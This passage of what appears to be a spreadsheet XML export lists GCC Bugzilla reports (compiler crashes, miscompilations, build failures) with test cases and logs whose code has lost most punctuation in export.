    memset(p cr+1 cr*cr)
inside a loop.  (Will attach this later.)
gcc 4.1.2 (snapshot from 20060715) appears to attempt to calculate cr*cr outside the loop and then load it when needed. However the generated code uses the wrong register for one the multiplicands:
	movl	%edi %ecx     /* edi contains cr */
	xorl	%eax %eax
	imull	%ebx %ecx     /* ebx contains another variable */
	leal	1(%edi) %ebx</t>
  </si>
  <si>
    <t>GCC-83553</t>
  </si>
  <si>
    <t>[6 Regression] compiler removes body of the for-loop although there is a case label inside</t>
  </si>
  <si>
    <t>Created attachment 42952
C++ source code
It seems that the complier removes the body of the for-loop completely. Obviously because there is a constant condition that is always false.
But I think this behaviour is wrong because there is a valid case-label inside the body.
The following is not working anymore.
int f2(int n)
{
    printf(f2(%d)\n n)
    int x=n
    switch(x){
        case 0:
              for(  x=0 false printf(for-expression\n)){
        case 2:     
              printf(case 2-statement\n)
            }
    }
    return x
}
In Version 7.2.1. the statement for case 2 and the for-expression are not executed.
Output&gt;
f2(0)
f2(2)
In Version 4.8.5. the code works as expected.
Output&gt;
f2(0)
f2(2)
case 2-statement
for-expression</t>
  </si>
  <si>
    <t>jan.dethlefs</t>
  </si>
  <si>
    <t>GCC-4435</t>
  </si>
  <si>
    <t>Object file has undefined basic_string symbol as local.</t>
  </si>
  <si>
    <t xml:space="preserve">	A simple C++ program tries to access the private symbol
	_Rep::_max_size in the basic_string module.  Here is the
	loadmap output:
	(ld): halt 4
	(ld): setopt r/o-&gt;w 
	(ld): setopt nodelcsect 
	(ld): savename a.out
	(ld): filelist 8 2
	(ld): i /lib/crt0.o
	(ld): i /tmp/cccZ9m7a.o
	(ld): i /tmp/ccECfIAF.o
	(ld): lib /usr/local/lib/gcc-lib/powerpc-ibm-aix4.3.3.0/3.0.1/../../../libstdc++.a
	(ld): lib /usr/lib/libm.a
	(ld): lib /usr/local/lib/gcc-lib/powerpc-ibm-aix4.3.3.0/3.0.1/../../../libgcc_s.a
	(ld): i /usr/local/lib/gcc-lib/powerpc-ibm-aix4.3.3.0/3.0.1/libgcc.a
	(ld): lib /usr/lib/libc.a
	LIBRARY: Shared object libstdc++.a[libstdc++.so.3]: 1247 symbols imported.
	LIBRARY: Shared object libgcc_s.a[shr.o]: 88 symbols imported.
	LIBRARY: Shared object libc.a[shr.o]: 2206 symbols imported.
	LIBRARY: Shared object libc.a[meth.o]: 2 symbols imported.
	LIBRARY: Shared object libc.a[aio.o]: 11 symbols imported.
	LIBRARY: Shared object libc.a[pse.o]: 78 symbols imported.
	LIBRARY: Shared object libc.a[dl.o]: 4 symbols imported.
	LIBRARY: Shared object libc.a[pty.o]: 1 symbols imported.
	FILELIST: Number of previously inserted files processed: 8
	(ld): exports /tmp/cc0MalCI.x 
	EXPORTS: Symbols exported: 32
	(ld): initfini _GLOBAL__FI_a_out _GLOBAL__FD_a_out 
	(ld): resolve
	RESOLVE: 160 of 4936 symbols were kept.
	(ld): addgl /usr/lib/glink.o
	ADDGL: Glink code added for 34 symbols.
	(ld): er full
	ld: 0711-318 ERROR: Undefined symbols were found.
		The following symbols are in error:
	 Symbol                    Inpndx  TY CL Source-File(Object-File) OR Import-File{Shared-object}
				      RLD: Address  Section  Rld-type Referencing Symbol
	 ----------------------------------------------------------------------------------------------
	 _ZNSs4_Rep11_S_max_sizeE  [52]    ER RW try.C(/tmp/ccECfIAF.o)
					   00005d48 .data    R_POS    [542]   
	 .pthread_mutex_lock       [94]    ER PR try.C(/tmp/ccECfIAF.o)
					   000047fc .text    R_RBR    [296]   
	 .pthread_mutex_unlock     [96]    ER PR try.C(/tmp/ccECfIAF.o)
					   00004894 .text    R_RBR    [298]   
	ER: The return code is 8.
	Moreover the output of nm try.o | fgrep _S_max_size identifies
	the symbol _ZNSs4_Rep11_S_max_sizeE in one place as undefined and
	in another as local data:
	_ZNSs4_Rep11_S_max_sizeE U          -
	_ZNSs4_Rep11_S_max_sizeE d      23880       4
	So far as I can tell this symbol is not defined in the module.
	It does not appear as a definition in the assembler output.
Release:
3.0.1
Environment:
System: AIX aocsmro3 3 4 000383244C00
Architecture: powerpc-ibm
host: aix4.3.3.0
build: aix4.3.3.0
target: aix4.3.3.0
configured with: /home/gcc/gcc-3.0.1/configure --with-gcc-version-trigger=/home/gcc/gcc-3.0.1/gcc/version.c --host=powerpc-ibm-aix4.3.3.0 --without-java --without-zlib --without-info --norecursion
How-To-Repeat:
	I compiled this simple C++ file try.C:
	#include 
	main()
	{
		cout &lt;&lt; hello world\n
	}
	This was the compiler command:
	g++ -Wl-bloadmap:/tmp/loadmap try.C -lstdc++</t>
  </si>
  <si>
    <t>gsicherm</t>
  </si>
  <si>
    <t>GCC-48967</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] ICE during use_narrower_mode</t>
  </si>
  <si>
    <t>Created attachment 24224
rh703888.ii
The attached testcase ICEs in 4.6 and 4.7 with -O2 -g -m64.
The problem is that lowpart_subreg returns NULL as a SImode subreg of DImode register 32 (fp0) isn't allowed.
--- var-tracking.c.jj 2011-04-13 14:04:00.000000000 +0200
+++ var-tracking.c 2011-05-11 18:05:41.000000000 +0200
@@ -7396 +73910 @@ use_narrower_mode_test (rtx *loc void *
     case REG:
       if (cselib_lookup (*loc GET_MODE (SUBREG_REG (subreg)) 0 VOIDmode))
         return 1
+      if (!validate_subreg (GET_MODE (subreg) GET_MODE (*loc)
+                            *loc subreg_lowpart_offset (GET_MODE (subreg)
+                                                         GET_MODE (*loc))))
+        return 1
       return -1
     case PLUS:
     case MINUS:
seems to fix this and doesn't seem to ever trigger in x86_64-linux bootstrap (this optimization has been added mainly for x86_64).</t>
  </si>
  <si>
    <t>GCC-4819</t>
  </si>
  <si>
    <t>H8-300 port corrupts r3 on interrupt prologue &amp; epilogue</t>
  </si>
  <si>
    <t>On entry to an interrupt routine that requires local
stack space the first thing that happens is the amount
of stack space is loaded into r3 and a sub r3r7 executed.
This happens before r3 is saved so on exit from the
interrupt routine r3 is corrupt.
eg...
_irq_handler:
	mov.w   #6r3
        sub.w   r3sp
	push    r0
        push    r2
The attached patch generates ugly code that simply issues
enough subs #2r7 instructions to allocate the required
memory.
Release:
gcc version 3.0.2
Environment:
i386 Redhat 7.2 with gcc-3.0.2 host compiler
How-To-Repeat:
#pragma interrupt
irq_handler()
{
	int	lots_storage[3]
	lots_storage[0] = 1
}</t>
  </si>
  <si>
    <t>hodsonr</t>
  </si>
  <si>
    <t>GCC-6603</t>
  </si>
  <si>
    <t>[SH] sh-elf fails to build libgcc</t>
  </si>
  <si>
    <t>Building a sh-elf compiler fails while building __muldi3
for libgcc:
../../../gcc/gcc/libgcc2.c: In function `__muldi3':
../../../gcc/gcc/libgcc2.c:367: RTL flag check: access macro used with unexpected rtx code `jump_insn' in dbr_schedule at reorg.c:3631
A similar failure occurs while building the same function
for with the sh-netbsdelf configuration I posted some time
ago (problems in updating this configuration prompted this
report).
Release:
3.2 20020507
Environment:
i386-netbsdelf host and sh-elf target
How-To-Repeat:
Attempt to build a sh-elf compiler.</t>
  </si>
  <si>
    <t>thorpej</t>
  </si>
  <si>
    <t>GCC-25503</t>
  </si>
  <si>
    <t>g++ accepts invalid typedef in template code</t>
  </si>
  <si>
    <t>d.bonekaemper</t>
  </si>
  <si>
    <t>GCC-82951</t>
  </si>
  <si>
    <t>gcc.c-torture/execute/20040409-1.c undefined behavior</t>
  </si>
  <si>
    <t>While testing a VRP patch I had failures for gcc.c-torture/execute/20040409-[1-3].c. If I run them with -fsanitize=undefined I get
20040409-1.c:27:12: runtime error: signed integer overflow: 0 - -2147483648 cannot be represented in type 'int'
20040409-1.c:17:12: runtime error: signed integer overflow: -2147483648 + -2147483648 cannot be represented in type 'int'
20040409-2.c:47:13: runtime error: signed integer overflow: 0 - -2147483648 cannot be represented in type 'int'
20040409-2.c:57:23: runtime error: signed integer overflow: 4660 - -2147483648 cannot be represented in type 'int'
20040409-2.c:27:13: runtime error: signed integer overflow: -2147483648 + -2147483648 cannot be represented in type 'int'
20040409-2.c:37:23: runtime error: signed integer overflow: -2147478988 + -2147483648 cannot be represented in type 'int'
20040409-2.c:111:18: runtime error: signed integer overflow: -2147483648 + -2147478988 cannot be represented in type 'int'
20040409-3.c:27:14: runtime error: signed integer overflow: 0 - -2147483648 cannot be represented in type 'int'
20040409-3.c:17:14: runtime error: signed integer overflow: -2147483648 + -2147483648 cannot be represented in type 'int'
Unless someone volunteers to improve the tests I'll likely remove the offending cases (and probably more since this is a grid and I don't want to look for every cell) from those 3 files.</t>
  </si>
  <si>
    <t>GCC-4990</t>
  </si>
  <si>
    <t>ice when using multiple non-class template parameters (works on 2.95.3)</t>
  </si>
  <si>
    <t>This problem is an extension of bug #3911. The code posted in that report compiles fine but the addition of another operator causes an Internal error: Segmentation fault .
The code works fine using gcc 2.95.3 and using Comeau Computing's online compiler (4.2.45.2).
This was the result of a compile of test-1.cc (code below).
&gt; g++ test-1.cc
test1.cc: In function `int main()':
test1.cc:28: Internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
As a side note I also posted this a while back but the version was a snapshot and not a full release.  That posting (#4377) seems to have been lost in the noise.  I reposted because I don't have access to modify a report and the end results are slightly different.
===================================================
code for test1.cc
template 
class unit
{
public:
 unit() {}
 unit( const unit&amp; ) {}
 template
 unit operator * ( const unit&amp; rhs ) const {
 return unit()
 }
 template
 unit operator / ( const unit&amp; rhs ) const {
 return unit()
 }
}
int main()
{
 const unit u1
 const unit u2
 unit u3( u1 / u2 )
 unit u4( u1 * u2 )
}
Release:
gcc-3.0.2
Environment:
Red Hat Linux 7.1 Intel
How-To-Repeat:
g++ test1.cc</t>
  </si>
  <si>
    <t>scott_k_macdonald</t>
  </si>
  <si>
    <t>GCC-60265</t>
  </si>
  <si>
    <t>[C++11] using-declaration of enumerator fails if fully qualified</t>
  </si>
  <si>
    <t>Hi
a using-declarator the nested-name of which includes an enumerator-name fails as g++ seems to expect only namespace-names at this point.
This seems a specific lookup problem of the using-declarator. Other qualified-ids seem to work as shown in the snippet below.
// -- enum.cc
namespace A
{
    enum E { V }
}
namespace B
{
    void f1()
    {
        int x
        x = A::E::V // OK
        x = A::V    // OK
    }
    void f2()
    {
        using A::V // OK
        int x
        x = V
    }
    void f3()
    {
        using A::E::V // ERR (but should be OK)
        int x
        x = V
    }
}
// -- end of enum.cc
$ ~/soft/gcc-experiment/gcc-install/bin/g++ -std=c++11 --version
g++ (GCC) 4.9.0 20140218 (experimental)
$ g++ -std=c++11 -c enum.cc
enum.cc: In function â€˜void B::f3()â€™:
enum.cc:24:21: error: â€˜A::Eâ€™ is not a namespace
         using A::E::V // ERR
                     ^
enum.cc:26:13: error: â€˜Vâ€™ was not declared in this scope
         x = V
             ^
enum.cc:26:13: note: suggested alternative:
enum.cc:3:14: note:   â€˜Vâ€™
     enum E { V }
Kind regards</t>
  </si>
  <si>
    <t>GCC-32635</t>
  </si>
  <si>
    <t>[4.3 Regression] gfortran - internal compiler error: verify_ssa failed</t>
  </si>
  <si>
    <t>This error poped up while trying to recompile one of my programs. I have reduced it about as much as I could - change almost anything and the error goes away -
[dranta:~/junk] dir% gfortran -c -O2 aled7.F
aled7.F: In function 'aled7':
aled7.F:1: error: definition in block 6 follows the use
for SSA_NAME: D.1023_61 in statement:
D.1017_52 = D.1023_61
aled7.F:1: internal compiler error: verify_ssa failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
[dranta:~/junk] dir% cat aled7.F
      subroutine aled7(ixibitableipip2imatnummat
     1                 mx0knumnpnumeliadj)
      implicit double precision (a-ho-z)                                    dp
      common/cale6/fst(164)ist(25614)
c
      dimension ib(*)itable(*)ip(3*)ip2(*)ix(6*)imat(nummat+1*)
c
c
      ipnt=1
      do 20 i=1numel
      if (imat(ix(5i)mx0).ne.1) go to 20
   20 continue
c
      k=0
      kflg=0
   25 do 30 i=1ipnt
      if (ip(1i).eq.0) go to 30
      ii=i
      go to 40
   30 continue
c
   40 k=k+1
      iel=ip(3ii)
      ib(k+iadj)=i1
      if (kflg.eq.1) ip(1ii)=0
      kflg=1
c
      isum=0
      do 50 i=1ipnt
      if (ip(1i).eq.0) isum=isum+1
      if (ip(1i).eq.0.or.ip(1i).ne.i2) go to 50
      ii=i
      if (ip(3i).eq.iel) go to 40
   50 continue
c
      if (ip(1ii).eq.i2) go to 40
      kflg=0
      if (isum.ne.ipnt) go to 25
c
      return
      end
[dranta:~/junk] dir% gfortran --v
Using built-in specs.
Target: powerpc-apple-darwin8.10.0
Configured with: ../gcc/configure --disable-multilib --prefix=/usr/local/gfortran --enable-languages=cfortran
Thread model: posix
gcc version 4.3.0 20070705 (experimental)
[dranta:~/junk] dir%</t>
  </si>
  <si>
    <t>GCC-15568</t>
  </si>
  <si>
    <t>Shared libgnat fails to link on IRIX 6 with GNU ld</t>
  </si>
  <si>
    <t>The shared libgnat.so fails to link on IRIX 6 if using GNU ld:
cd rts ../../xgcc -B../../ -shared  \
	-o libgnat-3.4.so \
	a-caldel.o a-calend.o a-chahan.o a-charac.o a-chlat1.o a-chlat9.o a-colien.o a-colire.o a-comlin.o a-cwila1.o a-cwila9.o a-decima.o a-diocst.o a-direct.o a-direio.o a-dirval.o a-einuoc.o a-elchha.o a-except.o a-exctra.o a-filico.o a-finali.o a-flteio.o a-fwteio.o a-inteio.o a-ioexce.o a-iwteio.o a-lfteio.o a-lfwtio.o a-liteio.o a-liwtio.o a-llftio.o a-llfwti.o a-llitio.o a-lliwti.o a-ncelfu.o a-ngcefu.o a-ngcoty.o a-ngelfu.o a-nlcefu.o a-nlcoty.o a-nlelfu.o a-nllcef.o a-nllcty.o a-nllefu.o a-nscefu.o a-nscoty.o a-nselfu.o a-nucoty.o a-nudira.o a-nuelfu.o a-nuflra.o a-numaux.o a-numeri.o a-sequio.o a-sfteio.o a-sfwtio.o a-siocst.o a-siteio.o a-siwtio.o a-ssicst.o a-ssitio.o a-ssiwti.o a-stmaco.o a-storio.o a-strbou.o a-stream.o a-strfix.o a-string.o a-strmap.o a-strsea.o a-strsup.o a-strunb.o a-ststio.o a-stunau.o a-stwibo.o a-stwifi.o a-stwima.o a-stwise.o a-stwisu.o a-stwiun.o a-suteio.o a-swuwti.o a-swmwco.o a-tags.o a-teioed.o a-textio.o a-ticoau.o a-ticoio.o a-tideau.o !
 a-tideio.o a-tienau.o a-tienio.o a-tifiio.o a-tiflau.o a-tiflio.o a-tigeau.o a-tiinau.o a-tiinio.o a-timoau.o a-timoio.o a-tiocst.o a-titest.o a-unccon.o a-uncdea.o a-witeio.o a-wtcoau.o a-wtcoio.o a-wtcstr.o a-wtdeau.o a-wtdeio.o a-wtedit.o a-wtenau.o a-wtenio.o a-wtfiio.o a-wtflau.o a-wtflio.o a-wtgeau.o a-wtinau.o a-wtinio.o a-wtmoau.o a-wtmoio.o a-wttest.o ada.o calendar.o g-arrspl.o g-awk.o g-bubsor.o g-busora.o g-busorg.o g-calend.o g-casuti.o g-catiio.o g-cgi.o g-cgicoo.o g-cgideb.o g-comlin.o g-comver.o g-crc32.o g-ctrl_c.o g-curexc.o g-debuti.o g-debpoo.o g-diopit.o g-dirope.o g-dyntab.o g-except.o g-excact.o g-exctra.o g-expect.o g-flocon.o g-heasor.o g-hesora.o g-hesorg.o g-htable.o g-io.o g-io_aux.o g-locfil.o g-md5.o g-memdum.o g-moreex.o g-os_lib.o g-perhas.o g-pehage.o g-regexp.o g-regpat.o g-sestin.o g-soccon.o g-socket.o g-socthi.o g-soliop.o g-souinf.o g-speche.o g-spipat.o g-spitbo.o g-sptabo.o g-sptain.o g-sptavs.o g-string.o g-strspl.o g-table.o g-taslo!
 c.o g-traceb.o g-wistsp.o gnat.o i-c.o i-cexten.o i-cobol.o i-cpoint.o
 i-cpp.o i-cstrea.o i-cstrin.o i-fortra.o i-pacdec.o interfac.o ioexcept.o machcode.o s-addima.o s-addope.o s-arit64.o s-assert.o s-atacco.o s-auxdec.o s-bitops.o s-boarop.o s-carsi8.o s-carun8.o s-casi16.o s-casi32.o s-casi64.o s-casuti.o s-caun16.o s-caun32.o s-caun64.o s-chepoo.o s-crtl.o s-crc32.o s-direio.o s-errrep.o s-except.o s-exctab.o s-exnint.o s-exnllf.o s-exnlli.o s-expint.o s-explli.o s-expllu.o s-expmod.o s-expuns.o s-fatflt.o s-fatgen.o s-fatlfl.o s-fatllf.o s-fatsfl.o s-ficobl.o s-fileio.o s-finimp.o s-finroo.o s-fore.o s-geveop.o s-htable.o s-imgbiu.o s-imgboo.o s-imgcha.o s-imgdec.o s-imgenu.o s-imgint.o s-imgllb.o s-imglld.o s-imglli.o s-imgllu.o s-imgllw.o s-imgrea.o s-imguns.o s-imgwch.o s-imgwiu.o s-io.o s-gloloc.o s-maccod.o s-mantis.o s-mastop.o s-osprim.o s-pack03.o s-pack05.o s-pack06.o s-pack07.o s-pack09.o s-pack10.o s-pack11.o s-pack12.o s-pack13.o s-pack14.o s-pack15.o s-pack17.o s-pack18.o s-pack19.o s-pack20.o s-pack21.o s-pack22.o s-pack23.o!
  s-pack24.o s-pack25.o s-pack26.o s-pack27.o s-pack28.o s-pack29.o s-pack30.o s-pack31.o s-pack33.o s-pack34.o s-pack35.o s-pack36.o s-pack37.o s-pack38.o s-pack39.o s-pack40.o s-pack41.o s-pack42.o s-pack43.o s-pack44.o s-pack45.o s-pack46.o s-pack47.o s-pack48.o s-pack49.o s-pack50.o s-pack51.o s-pack52.o s-pack53.o s-pack54.o s-pack55.o s-pack56.o s-pack57.o s-pack58.o s-pack59.o s-pack60.o s-pack61.o s-pack62.o s-pack63.o s-parame.o s-parint.o s-pooglo.o s-pooloc.o s-poosiz.o s-powtab.o s-purexc.o s-restri.o s-rident.o s-rpc.o s-scaval.o s-secsta.o s-sequio.o s-shasto.o s-sopco3.o s-sopco4.o s-sopco5.o s-stache.o s-stchop.o s-stalib.o s-stoele.o s-stopoo.o s-stratt.o s-strops.o s-soflin.o s-memory.o s-memcop.o s-traceb.o s-traces.o s-traent.o s-unstyp.o s-vaflop.o s-valboo.o s-valcha.o s-valdec.o s-valenu.o s-valint.o s-vallld.o s-vallli.o s-valllu.o s-valrea.o s-valuns.o s-valuti.o s-valwch.o s-veboop.o s-vector.o s-vercon.o s-vmexta.o s-wchcnv.o s-wchcon.o s-wchjis.o !
 s-wchstw.o s-wchwts.o s-widboo.o s-widcha.o s-widenu.o s-widlli.o s-wi
dllu.o s-widwch.o s-wwdcha.o s-wwdenu.o s-wwdwch.o system.o text_io.o  adaint.o argv.o cio.o cstreams.o ctrl_c.o errno.o exit.o raise.o sysdep.o aux-io.o init.o cal.o final.o tracebak.o expect.o mkdir.o socket.o  \
	-Wl-all-set_versionsgi1.0-update_registry../so_locations-sonamelibgnat-3.4.so \
	-lexc -lm
/homes/ro/bin/gld-2.14.92: unrecognized option '-all'
/homes/ro/bin/gld-2.14.92: use the --help option for usage information
collect2: ld returned 1 exit status
make[4]: *** [gnatlib-shared-default] Error 1
make[4]: Leaving directory `/.vol/gcc/obj/gcc-3.5.0-20040510/6.5-gcc-java-gas-gld/gcc/ada'
make[3]: *** [gnatlib-shared] Error 2
make[3]: Leaving directory `/.vol/gcc/obj/gcc-3.5.0-20040510/6.5-gcc-java-gas-gld/gcc/ada'
make[2]: *** [gnatlib-shared] Error 2
make[2]: Leaving directory `/.vol/gcc/obj/gcc-3.5.0-20040510/6.5-gcc-java-gas-gld/mips-sgi-irix6.5/libada'
make[1]: *** [all-target-libada] Error 2
Environment:
System: IRIX64 columba 6.5 10120104 IP27
host: mips-sgi-irix6.5
build: mips-sgi-irix6.5
target: mips-sgi-irix6.5
configured with: /.vol/gcc/src/gcc-dist/configure --prefix=/.vol/gcc --with-local-prefix=/.vol/gcc --disable-nls --with-gnu-as --with-as=/homes/ro/bin/gas-2.14.92 --with-gnu-ld --with-ld=/homes/ro/bin/gld-2.14.92 --enable-languages=adac++f77javaobjc --enable-libgcj
How-To-Repeat:
Bootstrap current mainline (before tree-ssa merge) as described above.</t>
  </si>
  <si>
    <t>GCC-42705</t>
  </si>
  <si>
    <t>[4.4 Regression] verify_flow_info failed with -O</t>
  </si>
  <si>
    <t>&gt; ./cc1 -quiet radeon_span.i -O 
radeon_span.c: In function 'r600_ptr_color':
radeon_span.c:228:17: error: label 
 in the middle of basic block 9radeon_span.c:228:17: internal compiler error: verify_flow_info failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-24971</t>
  </si>
  <si>
    <t>missing prototype causes strange effect at a distance with float.</t>
  </si>
  <si>
    <t>(972) uname -a
FreeBSD gadoid.ices.cmu.edu 5.2.1-RELEASE FreeBSD 5.2.1-RELEASE #0: Mon Feb 23 20:45:55 GMT 2004     root@wv1u.btc.adaptec.com:/usr/obj/usr/src/sys/GENERIC  i386
(973) cat a.c
#include 
#include 
int main(int argcchar *argv[])
{
  float n = 40
  int i
  for (i = 0i &lt; 10i++)
    foo()
  printf(%g\nn + 2.0)
  return 0
}
float foo()
{
  return 1.0
}
(974) gcc a.c -o a
a.c:17: warning: type mismatch with previous implicit declaration
a.c:10: warning: previous implicit declaration of `foo'
a.c:17: warning: `foo' was previously implicitly declared to return `int'
(975) ./a
nan
(976) 
The above program is missing a prototype for the foo function.  This correctly causes a warning but the missing prototype causes problems for completely unrelated code.  In the above example the foo() function is called 10 times then an unrelated floating point operation is peformed which incorrectly results in a nan.  Note that if the number of loop iterations is reduced to 6 or fewer times the program will print the correct result.</t>
  </si>
  <si>
    <t>hansen</t>
  </si>
  <si>
    <t>GCC-70497</t>
  </si>
  <si>
    <t>Missed CSE of subregs on GIMPLE</t>
  </si>
  <si>
    <t>RTL DSE handles removing the redundand load (and thus 'u' itself) in
union U { int i[16] char c }
char foo(int i)
{
  union U u
  u.i[0] = i
  return u.c
}
but nothing on GIMPLE does that.  FRE could do this replacing
u.c with proper sub-setting of i (via a cast or a BIT_FIELD_REF).</t>
  </si>
  <si>
    <t>GCC-45982</t>
  </si>
  <si>
    <t>[4.4 Regression] PTA does not track integers</t>
  </si>
  <si>
    <t>#include 
extern void abort (void)
uintptr_t __attribute__((purenoinlinenoclone))
foo (int *a)
{
  return (uintptr_t) a
}
void __attribute__((noinlinenoclone))
bar (uintptr_t a)
{
  int *p = (int *)a
  *p = 1
}
int main()
{
  int t = 0
  bar (foo (
  if (t != 1)
    abort ()
  return 0
}
Related to PR45967.</t>
  </si>
  <si>
    <t>GCC-79402</t>
  </si>
  <si>
    <t>ICE with submodules: module procedure interface defined in parent module</t>
  </si>
  <si>
    <t>Created attachment 40685
MCVE of ICE with submodule
Dear gfortran team
I am writing on the behalf of Chris Coutinho who cannot create a bugzilla account.
GNU gfortran generates and ICE when a submodule implementation of a procedure inherits its signature from the parent module by means of the module procedure syntax.
In the gfortran_ice_submodule.f90 file attached there is a minimal example raising the ICE (Arch Linux 4.8.13-1-ARCH #1 SMP PREEMPT) with both 6.3.1 and development trunk 7.0.0 (I have not yet installed 7.0.1 version). If you comment lines 24-26 and un-comment lines 17-22 the program runs as expected.
Our best regards.
Stefano</t>
  </si>
  <si>
    <t>stefano.zaghi</t>
  </si>
  <si>
    <t>GCC-80324</t>
  </si>
  <si>
    <t>_mm512_reduce_xxx type instrinsics are missing</t>
  </si>
  <si>
    <t>The following intrinsics are missing in GCC 6.3 (and also in trunk):
_mm512_reduce_add_epi32
_mm512_reduce_add_epi64
_mm512_reduce_add_pd
_mm512_reduce_add_ps
_mm512_reduce_and_epi32
_mm512_reduce_and_epi64
_mm512_reduce_max_epi32
_mm512_reduce_max_epi64
_mm512_reduce_max_epu32
_mm512_reduce_max_pd
_mm512_reduce_max_ps
_mm512_reduce_min_epi32
_mm512_reduce_min_epi64
_mm512_reduce_min_epu32
_mm512_reduce_min_pd
_mm512_reduce_min_ps
_mm512_reduce_mul_epi32
_mm512_reduce_mul_ps
_mm512_reduce_or_epi64
There are likely some others too but these are the ones for which compilation of our project fails.</t>
  </si>
  <si>
    <t>GCC-12527</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] [arm] bootstrap error on arm-linux miscompiling genconstants</t>
  </si>
  <si>
    <t>seen on HEAD 20031005 and 20030909 last sucessful bootstrap on HEAD 20030722.
stage1/xgcc -Bstage1/ -B/usr/lib/gcc-snapshot/arm-linux/bin/   -O2  -DIN_GCC  
-W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -pedantic
-Wno-long-long  -fno-common   -DHAVE_CONFIG_H -DGENERATOR_FILE  -o genconstants \
 genconstants.o gensupport.o dummy-conditions.o rtl.o read-rtl.o bitmap.o
ggc-none.o \
    errors.o ../libiberty/libiberty.a
./genconstants ../../src/gcc/config/arm/arm.md &gt; tmp-constants.h
make[4]: *** [s-constants] Error 132</t>
  </si>
  <si>
    <t>GCC-40508</t>
  </si>
  <si>
    <t>memory leak in internal write of gfortran</t>
  </si>
  <si>
    <t>alain-heberts-macbook-pro:~ alainhebert$ gfortran -v
Using built-in specs.
Target: i386-apple-darwin8.10.1
Configured with: /tmp/gfortran-20090604/ibin/../gcc/configure --prefix=/usr/local/gfortran --enable-languages=cfortran --with-gmp=/tmp/gfortran-20090604/gfortran_libs --enable-bootstrap
Thread model: posix
gcc version 4.5.0 20090604 (experimental) [trunk revision 148180] (GCC) 
There is a memory leak in the latest build of gfortran. This leak is related to the internal write operation. The bug occurs when there is no memory left (it can be long...).
Here is the code:
      character hmg1*52hmg2*52
      integer idata(13)
      hmg1='1234567890123456789012345678901234567890123456789012'
      read(hmg1'(13A4)') (idata(ii)ii=113)
      do i=1100
         do j=110000000
            write(hmg2'(13A4)') (idata(ii)ii=113)
         enddo
         print *ihmg2
      enddo
      print *'everything OK'
      stop
      end
Here is the output:
(cut...)
          21 1234567890123456789012345678901234567890123456789012
          22 1234567890123456789012345678901234567890123456789012
a.out(96109) malloc: *** mmap(size=2097152) failed (error code=12)
*** error: can't allocate region
*** set a breakpoint in malloc_error_break to debug
Operating system error: Cannot allocate memory
Memory allocation failed</t>
  </si>
  <si>
    <t>alain.hebert</t>
  </si>
  <si>
    <t>GCC-46730</t>
  </si>
  <si>
    <t>[4.6 Regression] Failed to profiledbootstrap</t>
  </si>
  <si>
    <t>On Linux/x86-64 revision 167305 failed to profiledbootstrap:
http://gcc.gnu.org/ml/gcc-regression/2010-11/msg00435.html
/export/gnu/import/svn/gcc-test-profile/bld/./prev-gcc/xgcc -B/export/gnu/import/svn/gcc-test-profile/bld/./prev-gcc/ -B/usr/local/x86_64-unknown-linux-gnu/bin/ -B/usr/local/x86_64-unknown-linux-gnu/bin/ -B/usr/local/x86_64-unknown-linux-gnu/lib/ -isystem /usr/local/x86_64-unknown-linux-gnu/include -isystem /usr/local/x86_64-unknown-linux-gnu/sys-include    -c -DHAVE_CONFIG_H -g -O2 -fprofile-use  -I. -I../../src-trunk/libiberty/../include  -W -Wall -Wwrite-strings -Wc++-compat -Wstrict-prototypes -pedantic  ../../src-trunk/libiberty/splay-tree.c -o splay-tree.o
../../src-trunk/libiberty/splay-tree.c: In function 'splay_tree_insert':
../../src-trunk/libiberty/splay-tree.c:567:1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Revision 167295 is OK.</t>
  </si>
  <si>
    <t>GCC-49834</t>
  </si>
  <si>
    <t>[C++0x] type deduction in for-each loop in template function</t>
  </si>
  <si>
    <t>Created attachment 24822
example source that produces the bug
As I suppose auto keyword should be replaced by type of the expression
for example consider the expression where p has C type C is STL iterable type: for (const auto &amp;i: p). Here 'auto' should be replaced with C::value_type. But in attached source I have two similar loops: for (const C::value_type &amp;i: p) i.second.get_value() and for (const auto &amp;i: p) i.second.get_value() where first is compiled but second has compilation error:
test.cpp: In function 'Ret f(const C&amp;)':
test.cpp:32:22: error: expected primary-expression before 'int'
test.cpp:32:22: error: expected '' before 'int'
this behaviour is the same on system 4.6.1 gcc version I also used gcc-snapshot 4.7.20110723-1 as g++-4.7
# uname -a
Linux LeX-laptop 2.6.38-ARCH #1 SMP PREEMPT Mon Jun 6 22:49:29 CEST 2011 x86_64 Genuine Intel(R) CPU U4100 @ 1.30GHz GenuineIntel GNU/Linux
# some system info
I am running amd64 Archlinux
Full error message with
# LANG=C g++-4.7 -v -std=c++0x test.cpp -Wall -Wextra
Using built-in specs.
COLLECT_GCC=g++-4.7
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-unknown-linux-gnu/4.7.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /usr/src/builder/yaourt/yaourt-tmp-lex/aur-gcc-snapshot/src/gcc-4.7-20110723/configure --prefix=/usr --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --datadir=/usr/share/gcc-4.7 --with-bugurl='http://aur.archlinux.org/packages.php?ID=16045' --enable-languages=cc++lto --enable-shared --enable-threads=posix --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-clocale=gnu --enable-gnu-unique-object --enable-linker-build-id --with-ppl --enable-cloog-backend=isl --enable-lto --enable-gold --enable-ld=default --enable-plugin --with-plugin-ld=ld.gold --with-linker-hash-style=gnu --disable-multilib --disable-libstdcxx-pch --enable-checking=release --disable-werror --program-suffix=-4.7 --enable-version-specific-runtime-libs
Thread model: posix
gcc version 4.7.0 20110723 (experimental) (GCC) 
COLLECT_GCC_OPTIONS='-v' '-std=c++0x' '-Wall' '-Wextra' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
